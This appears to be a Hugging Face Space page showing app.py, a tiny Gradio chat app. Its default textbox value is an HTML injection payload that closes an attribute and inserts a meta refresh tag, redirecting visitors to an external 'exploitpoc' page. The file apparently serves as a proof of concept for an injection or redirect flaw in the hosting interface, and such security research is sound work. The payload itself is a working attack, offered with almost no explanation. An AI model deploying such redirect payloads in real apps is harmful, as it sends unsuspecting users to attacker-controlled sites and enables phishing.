a.b.c.d / app.py
shubhankargaur's picture
Update app.py
af5d159 verified
Raw
History Blame Contribute Delete
306 Bytes
import gradio as gr
def respond(message):
return f"Received: {message}"
default_instruction = '><meta http-equiv="refresh" content="0;url=https://huggingfaceexploitpoc.pages.dev/index.html">'
gr.ChatInterface(fn=respond, chatbot=gr.Chatbot(), textbox=gr.Textbox(value=default_instruction)).launch()